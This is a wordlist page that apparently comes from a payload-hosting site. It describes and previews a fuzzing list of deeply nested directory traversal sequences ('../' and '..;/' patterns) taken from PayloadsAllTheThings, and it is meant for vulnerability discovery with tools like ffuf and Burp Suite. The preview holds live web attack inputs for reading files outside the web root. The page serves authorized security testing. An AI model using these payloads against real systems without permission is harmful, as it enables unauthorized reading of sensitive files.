Skip to content
Fuzzing67.3 KB

Deep directory traversal payloads

Deeply nested ../ path-traversal sequences for reaching files several directory levels above the web root.

View source
Size
67.3 KB
Category
Fuzzing
Source
swisskyrepo/PayloadsAllTheThings
License
MIT
Recommended tools
ffufburpsuitewfuzz

Preview

First 15 entries. Download or copy the full list (67.3 KB) using the buttons above.

>head deep-directory-traversal-patt.txt67.3 KB
../{FILE}
../../{FILE}
../../../{FILE}
../../../../{FILE}
../../../../../{FILE}
../../../../../../{FILE}
../../../../../../../{FILE}
../../../../../../../../{FILE}
..;/{FILE}
..;/..;/{FILE}
..;/..;/..;/{FILE}
..;/..;/..;/..;/{FILE}
..;/..;/..;/..;/..;/{FILE}
..;/..;/..;/..;/..;/..;/{FILE}
..;/..;/..;/..;/..;/..;/..;/{FILE}

Deeply nested ../ path-traversal sequences for reaching files several directory levels above the web root.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 67.3 KB and pairs well with tools such as ffuf, burpsuite, wfuzz. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from swisskyrepo/PayloadsAllTheThings and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.